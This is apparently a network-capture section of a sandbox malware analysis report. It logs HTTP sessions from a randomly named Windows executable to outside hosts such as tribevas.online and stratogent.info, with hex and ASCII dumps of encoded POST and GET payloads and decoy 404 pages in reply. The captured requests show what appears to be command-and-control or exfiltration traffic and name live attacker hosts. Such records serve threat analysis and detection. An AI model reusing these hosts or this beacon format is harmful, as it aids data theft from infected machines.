Oct 7, 2024 11:53:06.527235031 CEST	1289	OUT	POST /io0i/ HTTP/1.1 Host: www.tribevas.online Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.tribevas.online Referer: http://www.tribevas.online/io0i/ Connection: close Content-Length: 3341 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 66 42 4b 35 74 72 6f 32 6e 36 6c 6a 46 69 2f 32 73 62 42 57 30 6c 55 77 64 53 50 52 4d 32 4a 5a 4d 58 75 4c 35 59 59 6a 76 76 69 68 78 49 38 46 2f 69 6e 4d 6a 72 69 2f 67 31 4d 4e 78 4f 49 51 34 78 59 35 2b 39 33 62 36 42 70 72 62 35 75 44 50 6e 79 54 7a 6b 70 65 39 35 42 63 69 4c 61 74 42 4e 58 35 58 4c 44 68 77 6d 53 5a 77 57 4a 75 6b 36 31 6b 47 64 69 76 47 50 39 76 4e 65 2f 6a 71 67 36 43 74 4d 30 65 4f 34 52 58 74 67 58 44 4c 31 54 6a 41 31 32 4e 50 4e 67 78 69 41 6c 6a 63 2f 70 2f 68 7a 50 45 70 6e 6f 50 4e 59 32 54 79 52 45 73 4f 42 47 77 39 78 35 67 48 4d 4f 66 34 69 38 6b 30 34 66 4a 50 58 36 4a 49 4c 4d 69 71 42 67 64 33 67 70 41 6c 79 6f 4d 4f 51 6b 73 49 42 74 36 38 68 4a 70 4e 2b 74 34 5a 75 58 44 61 6a 52 52 70 77 4b 4a 75 53 53 6a 35 43 30 4e 7a 53 46 6f 41 6c 48 79 75 30 76 45 78 4d 59 6c 53 77 6b 59 44 6b 32 45 69 71 48 61 70 6c 46 48 36 41 4e 41 77 44 6a 53 6f 63 37 70 7a 57 62 50 46 46 49 4d 2b 31 68 7a 79 49 38 6d 49 43 41 59 62 59 58 31 36 6d 30 56 42 [TRUNCATED] Data Ascii: VzK4o8Jx=fBK5tro2n6ljFi/2sbBW0lUwdSPRM2JZMXuL5YYjvvihxI8F/inMjri/g1MNxOIQ4xY5+93b6Bprb5uDPnyTzkpe95BciLatBNX5XLDhwmSZwWJuk61kGdivGP9vNe/jqg6CtM0eO4RXtgXDL1TjA12NPNgxiAljc/p/hzPEpnoPNY2TyREsOBGw9x5gHMOf4i8k04fJPX6JILMiqBgd3gpAlyoMOQksIBt68hJpN+t4ZuXDajRRpwKJuSSj5C0NzSFoAlHyu0vExMYlSwkYDk2EiqHaplFH6ANAwDjSoc7pzWbPFFIM+1hzyI8mICAYbYX16m0VBcGEasEaYqtOO9cKnainPEF7CG2AVofnTCNFAowUBeS8JimrGjqsylq7HMTymTL7lLaxHzf+VGeVOueGf2PDoZnob+R7oIoIwLgGmiU/g5DjGHQL9dPyKWmkJAirEXGF3lKk2XpoRBwBdJfEM5xwEEIBsSN7JxeaH1CzSpZ5c/OeC5kZU37h5QDlsb2jP0CA7vVnkWiP8OkNQ2JRT5jiwuFD2rZFqGVebmlUjKMbPrMA4FwqwCAc5159OPorjym5QPUJLLg0PSacN5NzWcgHSvwrq/IPfEgAcBfb4e2p3mTEm82l9OJ27XlkjcbVQx1naKOqelCZlWcfCCunTSuhfQMw+s5AbUYd8nlesEAUgMk61U3XAkZHtCEYsrAjLFxPLqOjNpya7gz34lHeVc83mE9mZ9sgFKyiG8M0ZDnYMShdqMzLC/2Yst8qkf7ZkxqfpqFKbCi+Ze+WBCstwUQkpJWg2Vv7AOQJEVfAfgMA4lE
Oct 7, 2024 11:53:06.527282953 CEST	2513	OUT	Data Raw: 64 64 51 43 78 34 65 38 72 7a 62 68 65 6d 52 44 4a 78 41 6e 6a 51 70 63 5a 65 78 44 47 6b 63 5a 77 68 37 48 49 45 62 6d 30 68 5a 59 76 4e 37 77 54 38 6c 7a 31 71 52 6a 5a 71 46 56 6b 76 30 48 62 61 2b 4a 69 6c 57 62 73 79 2f 35 77 31 48 63 48 64 Data Ascii: ddQCx4e8rzbhemRDJxAnjQpcZexDGkcZwh7HIEbm0hZYvN7wT8lz1qRjZqFVkv0Hba+JilWbsy/5w1HcHd7M1/Q/+kcD4qNuLCh5kzojTD3DVVx5+fbEt4tlng9YT3DqxZ88+/aizC+toMlYBQKxz0xNPTzOLbAHzj4vn2Rpo4ocqtvq5hV8kHA920GKWOuw2iS3TY3sqAtnplyUTrpfhWTkqHbwauNYkp2uU7zQ86HUURpaQdA
Oct 7, 2024 11:53:06.697001934 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Mon, 07 Oct 2024 09:53:06 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 13840 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
Oct 7, 2024 11:53:06.697205067 CEST	1289	IN	Data Raw: 3a 20 72 6f 74 61 74 65 58 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a Data Ascii: : rotateX(30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.pat
Oct 7, 2024 11:53:06.697326899 CEST	1289	IN	Data Raw: 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31 30 37 20 32 2e 31 38 32 2d 31 32 2e 34 31 20 36 2e 36 34 32 2d 31 36 2e 35 37 37 20 39 2e 30 37 32 2d 38 2e 34 37 34 20 32 31 2e 32 Data Ascii: 01.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645-57.844 18.377-86.152 9.873-2.101-.63-4.312-
Oct 7, 2024 11:53:06.697379112 CEST	1289	IN	Data Raw: 32 30 34 2d 37 32 2e 34 34 36 2d 34 2e 30 35 37 2d 32 38 2e 34 30 32 2d 2e 38 35 34 2d 34 39 2e 38 37 32 2d 31 2e 39 36 38 2d 36 32 2e 31 34 20 34 2e 30 35 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 36 31 20 36 38 Data Ascii: 204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.415 24.569 11.55
Oct 7, 2024 11:53:06.697581053 CEST	1289	IN	Data Raw: 33 20 37 2e 32 2d 34 39 2e 34 33 34 20 37 2e 37 36 2d 32 31 2e 39 30 34 2e 35 36 2d 33 38 2e 36 30 34 20 31 2e 30 31 32 2d 34 39 2e 38 34 33 2d 2e 34 36 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 36 31 20 36 38 29 Data Ascii: 3 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161 68)"/> <path fill="#FFEAD4" d="M45.508 13.114c-.368.549-.54 1.598-.503 2.445.017.392.297.604.45.287.143-.297.222-.617.303-.978.087-.387.197-.735.238
Oct 7, 2024 11:53:06.697632074 CEST	1289	IN	Data Raw: 36 2d 2e 35 31 33 20 32 2e 33 38 31 2d 2e 30 30 35 2e 34 37 2e 33 33 33 2e 37 34 39 2e 34 37 2e 33 35 2e 32 30 36 2d 2e 35 39 32 2e 34 32 32 2d 31 2e 33 34 2e 35 31 37 2d 32 2e 30 34 37 2e 30 38 32 2d 2e 35 39 38 2d 2e 32 35 33 2d 2e 39 32 31 2d Data Ascii: 6-.513 2.381-.005.47.333.749.47.35.206-.592.422-1.34.517-2.047.082-.598-.253-.921-.474-.684M38.964 14.6c-.26-.324-1.293-.581-2.192-.6-.626-.012-.971.28-.65.452.459.244 1.155.57 2.063.547.56-.014.936-.205.78-.4M51.58 3.028c-.54-.1-.912.074-1.39
Oct 7, 2024 11:53:06.697643995 CEST	1289	IN	Data Raw: 31 2e 31 33 2e 37 38 35 2e 31 34 34 2e 30 36 35 2d 2e 35 33 38 2e 32 32 2d 31 2e 30 34 31 2e 32 30 33 2d 31 2e 36 31 32 2d 2e 30 31 36 2d 2e 35 32 38 2d 2e 32 33 38 2d 2e 38 32 2d 2e 34 36 35 2d 2e 37 30 36 4d 31 35 2e 39 34 36 20 32 31 2e 32 30 Data Ascii: 1.13.785.144.065-.538.22-1.041.203-1.612-.016-.528-.238-.82-.465-.706M15.946 21.201c-.04-.142-.134-.197-.214-.2-.311-.02-.464.621-.576 1.05-.124.468-.188.945-.14 1.461.053.562.486.699.57.088.053-.375.146-.754.233-1.107.108-.439.265-.815.127-1.
Oct 7, 2024 11:53:06.697655916 CEST	1289	IN	Data Raw: 39 2d 2e 30 38 32 20 32 2e 30 35 33 2d 2e 31 34 2e 34 36 38 2d 2e 30 34 20 31 2e 33 35 2e 32 35 33 20 31 2e 35 31 36 2d 2e 31 36 34 2e 31 39 31 2d 2e 34 38 33 2d 2e 39 30 36 2d 2e 37 2d 31 2e 35 38 33 2d 2e 36 38 35 4d 38 31 2e 39 35 38 20 31 34 Data Ascii: 9-.082 2.053-.14.468-.04 1.35.253 1.516-.164.191-.483-.906-.7-1.583-.685M81.958 14.767c-.103-.44-.306-.8-.377-1.279-.095-.644-.518-.678-.57.063-.07.998.19 1.845.53 2.34.293.426.566-.494.417-1.124M99.918 9.365c-.177-.18-.36-.23-.56-.337-.295-.1
Oct 7, 2024 11:53:06.697736025 CEST	1289	IN	Data Raw: 2e 37 31 20 31 33 2e 31 38 34 63 2d 2e 32 38 32 2e 32 37 36 2d 2e 35 35 38 2e 35 35 35 2d 2e 38 35 32 2e 38 31 35 2d 2e 31 34 33 2e 31 32 36 2d 2e 33 33 33 2e 32 35 36 2d 2e 34 34 36 2e 34 32 2d 2e 31 30 38 2e 31 35 36 2d 2e 31 37 34 2e 33 34 2d Data Ascii: .71 13.184c-.282.276-.558.555-.852.815-.143.126-.333.256-.446.42-.108.156-.174.34-.284.489-.392.535.193 1.412.694.973.104-.091.318-.086.446-.134.16-.062.324-.11.486-.169.51-.186.872-.578 1.145-1.11.418-.816-.553-1.907-1.188-1.284M97.93 18.019c
Oct 7, 2024 11:53:06.697747946 CEST	1289	IN	Data Raw: 33 33 22 20 64 3d 22 4d 35 31 2e 39 37 36 20 33 32 2e 35 30 35 63 2e 32 37 20 32 2e 37 34 38 2d 31 2e 37 33 35 20 35 2e 31 39 37 2d 34 2e 34 37 36 20 35 2e 34 37 2d 32 2e 37 34 38 2e 32 37 34 2d 35 2e 31 39 39 2d 31 2e 37 33 32 2d 35 2e 34 37 36 Data Ascii: 33" d="M51.976 32.505c.27 2.748-1.735 5.197-4.476 5.47-2.748.274-5.199-1.732-5.476-4.48-.27-2.748 1.735-5.197 4.483-5.47 2.748-.274 5.192 1.733 5.469 4.48M93.976 28.505c.27 2.748-1.735 5.197-4.483 5.47-2.748.273-5.192-1.733-5.469-4.48-.27-2.74

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.11.30	49793	184.94.215.26	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:53:09.228904963 CEST	392	OUT	GET /io0i/?0zu8A=o2yln6&VzK4o8Jx=SDiZucYNl7hAWjD3kY1F3Wh8SSqKLzQrPgO87aM6gvawjY1J8DLcjr26gXoQ9oM68w0z/Zj56CIgKdiiaxfLyhFp6oFJlK6eDMjbU8To92G67g984b8BKfg= HTTP/1.1 Host: www.tribevas.online Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Oct 7, 2024 11:53:09.400053024 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Mon, 07 Oct 2024 09:53:09 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 13840 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
Oct 7, 2024 11:53:09.400090933 CEST	1289	IN	Data Raw: 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 58 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a Data Ascii: { transform: rotateX(30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content:
Oct 7, 2024 11:53:09.400115967 CEST	1289	IN	Data Raw: 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31 30 37 20 32 2e 31 38 32 2d 31 32 2e 34 31 20 36 2e 36 34 32 2d 31 36 2e 35 37 37 20 39 Data Ascii: 6.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645-57.844 18.377-86.152 9.873-2
Oct 7, 2024 11:53:09.400584936 CEST	1289	IN	Data Raw: 2d 2e 39 35 36 2d 34 34 2e 30 34 34 2d 33 2e 32 30 34 2d 37 32 2e 34 34 36 2d 34 2e 30 35 37 2d 32 38 2e 34 30 32 2d 2e 38 35 34 2d 34 39 2e 38 37 32 2d 31 2e 39 36 38 2d 36 32 2e 31 34 20 34 2e 30 35 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 Data Ascii: -.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.4
Oct 7, 2024 11:53:09.400605917 CEST	1289	IN	Data Raw: 2e 32 35 32 20 33 2e 39 38 35 2d 32 37 2e 35 33 20 37 2e 32 2d 34 39 2e 34 33 34 20 37 2e 37 36 2d 32 31 2e 39 30 34 2e 35 36 2d 33 38 2e 36 30 34 20 31 2e 30 31 32 2d 34 39 2e 38 34 33 2d 2e 34 36 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 Data Ascii: .252 3.985-27.53 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161 68)"/> <path fill="#FFEAD4" d="M45.508 13.114c-.368.549-.54 1.598-.503 2.445.017.392.297.604.45.287.143-.297.222-.617.303-.978.087-.3
Oct 7, 2024 11:53:09.400628090 CEST	1289	IN	Data Raw: 35 2e 34 31 34 2d 2e 35 30 35 20 31 2e 35 36 36 2d 2e 35 31 33 20 32 2e 33 38 31 2d 2e 30 30 35 2e 34 37 2e 33 33 33 2e 37 34 39 2e 34 37 2e 33 35 2e 32 30 36 2d 2e 35 39 32 2e 34 32 32 2d 31 2e 33 34 2e 35 31 37 2d 32 2e 30 34 37 2e 30 38 32 2d Data Ascii: 5.414-.505 1.566-.513 2.381-.005.47.333.749.47.35.206-.592.422-1.34.517-2.047.082-.598-.253-.921-.474-.684M38.964 14.6c-.26-.324-1.293-.581-2.192-.6-.626-.012-.971.28-.65.452.459.244 1.155.57 2.063.547.56-.014.936-.205.78-.4M51.58 3.028c-.54-.
Oct 7, 2024 11:53:09.400654078 CEST	1289	IN	Data Raw: 37 34 2e 30 36 36 2e 39 34 36 2e 36 36 34 20 31 2e 31 33 2e 37 38 35 2e 31 34 34 2e 30 36 35 2d 2e 35 33 38 2e 32 32 2d 31 2e 30 34 31 2e 32 30 33 2d 31 2e 36 31 32 2d 2e 30 31 36 2d 2e 35 32 38 2d 2e 32 33 38 2d 2e 38 32 2d 2e 34 36 35 2d 2e 37 Data Ascii: 74.066.946.664 1.13.785.144.065-.538.22-1.041.203-1.612-.016-.528-.238-.82-.465-.706M15.946 21.201c-.04-.142-.134-.197-.214-.2-.311-.02-.464.621-.576 1.05-.124.468-.188.945-.14 1.461.053.562.486.699.57.088.053-.375.146-.754.233-1.107.108-.439.
Oct 7, 2024 11:53:09.400675058 CEST	1289	IN	Data Raw: 35 36 2e 37 31 33 2e 30 34 37 20 31 2e 33 35 39 2d 2e 30 38 32 20 32 2e 30 35 33 2d 2e 31 34 2e 34 36 38 2d 2e 30 34 20 31 2e 33 35 2e 32 35 33 20 31 2e 35 31 36 2d 2e 31 36 34 2e 31 39 31 2d 2e 34 38 33 2d 2e 39 30 36 2d 2e 37 2d 31 2e 35 38 33 Data Ascii: 56.713.047 1.359-.082 2.053-.14.468-.04 1.35.253 1.516-.164.191-.483-.906-.7-1.583-.685M81.958 14.767c-.103-.44-.306-.8-.377-1.279-.095-.644-.518-.678-.57.063-.07.998.19 1.845.53 2.34.293.426.566-.494.417-1.124M99.918 9.365c-.177-.18-.36-.23-.
Oct 7, 2024 11:53:09.400738955 CEST	1289	IN	Data Raw: 30 35 2d 2e 33 37 2d 31 2e 36 39 4d 31 31 37 2e 37 31 20 31 33 2e 31 38 34 63 2d 2e 32 38 32 2e 32 37 36 2d 2e 35 35 38 2e 35 35 35 2d 2e 38 35 32 2e 38 31 35 2d 2e 31 34 33 2e 31 32 36 2d 2e 33 33 33 2e 32 35 36 2d 2e 34 34 36 2e 34 32 2d 2e 31 Data Ascii: 05-.37-1.69M117.71 13.184c-.282.276-.558.555-.852.815-.143.126-.333.256-.446.42-.108.156-.174.34-.284.489-.392.535.193 1.412.694.973.104-.091.318-.086.446-.134.16-.062.324-.11.486-.169.51-.186.872-.578 1.145-1.11.418-.816-.553-1.907-1.188-1.28
Oct 7, 2024 11:53:09.400741100 CEST	1289	IN	Data Raw: 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 36 33 33 22 20 64 3d 22 4d 35 31 2e 39 37 36 20 33 32 2e 35 30 35 63 2e 32 37 20 32 2e 37 34 38 2d 31 2e 37 33 35 20 35 2e 31 39 37 2d 34 2e 34 37 36 20 35 2e 34 37 2d 32 2e 37 34 38 2e 32 37 34 2d 35 2e Data Ascii: <path fill="#633" d="M51.976 32.505c.27 2.748-1.735 5.197-4.476 5.47-2.748.274-5.199-1.732-5.476-4.48-.27-2.748 1.735-5.197 4.483-5.47 2.748-.274 5.192 1.733 5.469 4.48M93.976 28.505c.27 2.748-1.735 5.197-4.483 5.47-2.748.273-5.192-1.733-5.46
Oct 7, 2024 11:53:09.401129961 CEST	1173	IN	Data Raw: 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 35 2e 37 38 39 20 34 2e 36 33 32 4c 31 35 2e 37 38 39 20 30 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 6d 61 74 72 69 78 28 30 20 2d 31 20 2d 31 20 30 20 33 31 38 20 31 37 30 29 22 2f 3e 0a 20 20 Data Ascii: <path d="M15.789 4.632L15.789 0" transform="matrix(0 -1 -1 0 318 170)"/> </g> <path fill="#4B4B62" class="path" fill-rule="nonzero" stroke="#4B4B62" stroke-width="2" d="M198.754 186c1.56 0 2.246-.703 2.246-2.3v-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.11.30	49794	76.223.105.230	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:53:14.704696894 CEST	665	OUT	POST /f3n5/ HTTP/1.1 Host: www.stratogent.info Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.stratogent.info Referer: http://www.stratogent.info/f3n5/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 51 6a 4c 56 70 44 35 5a 66 4f 36 69 4d 46 63 73 32 77 6c 33 48 58 66 39 72 2b 76 75 62 68 47 45 71 6b 64 30 71 4e 6c 54 42 66 4d 34 77 53 52 32 50 7a 75 63 44 76 78 79 52 6b 71 30 4e 36 48 31 31 6b 30 2f 58 2b 32 2b 7a 4d 39 2f 70 70 31 62 34 63 72 6e 78 37 35 6a 76 72 49 76 6f 50 33 72 70 42 64 37 71 74 54 5a 63 6f 36 54 36 66 75 41 4d 49 79 4c 47 65 62 51 79 71 4c 55 6f 2b 69 43 54 73 43 71 53 6a 64 4b 4d 44 63 6f 30 57 79 69 76 75 51 33 70 55 6b 6b 70 6a 68 53 73 57 55 2b 6e 68 2f 65 49 50 2b 6f 53 30 48 6c 68 63 73 39 76 55 6f 32 50 4d 59 4d 70 49 30 48 4b 79 65 6e 6d 77 3d 3d Data Ascii: VzK4o8Jx=QjLVpD5ZfO6iMFcs2wl3HXf9r+vubhGEqkd0qNlTBfM4wSR2PzucDvxyRkq0N6H11k0/X+2+zM9/pp1b4crnx75jvrIvoP3rpBd7qtTZco6T6fuAMIyLGebQyqLUo+iCTsCqSjdKMDco0WyivuQ3pUkkpjhSsWU+nh/eIP+oS0Hlhcs9vUo2PMYMpI0HKyenmw==
Oct 7, 2024 11:53:14.811536074 CEST	325	IN	HTTP/1.1 301 Moved Permanently location: https://stratogent.info/f3n5/ vary: Accept-Encoding server: DPS/2.0.0+sha-227ca78 x-version: 227ca78 x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Mon, 07 Oct 2024 09:53:14 GMT keep-alive: timeout=5 transfer-encoding: chunked connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.11.30	49795	76.223.105.230	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:53:17.335352898 CEST	685	OUT	POST /f3n5/ HTTP/1.1 Host: www.stratogent.info Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.stratogent.info Referer: http://www.stratogent.info/f3n5/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 51 6a 4c 56 70 44 35 5a 66 4f 36 69 4d 6c 73 73 37 33 5a 33 53 6e 66 79 33 4f 76 75 51 42 47 41 71 6b 52 30 71 4d 68 35 55 36 63 34 77 79 68 32 4f 79 75 63 57 76 78 79 4a 30 71 78 51 71 48 45 31 6b 35 4b 58 2f 61 2b 7a 4d 5a 2f 70 73 4a 62 35 76 44 34 77 72 35 68 36 62 49 74 6e 76 33 72 70 42 64 37 71 70 36 32 63 72 4b 54 36 4c 53 41 50 73 6d 4d 4d 2b 62 52 6d 36 4c 55 37 75 6a 4a 54 73 43 49 53 69 78 67 4d 41 6b 6f 30 55 61 69 68 62 77 30 7a 45 6b 6d 6b 44 67 57 74 6e 35 77 6d 51 4f 73 4f 73 4f 64 66 45 69 5a 74 72 64 6e 79 58 63 30 63 73 6b 68 31 4a 5a 76 49 77 66 38 37 77 5a 48 6c 55 46 4a 54 57 51 50 44 39 70 2b 7a 5a 41 77 42 68 59 3d Data Ascii: 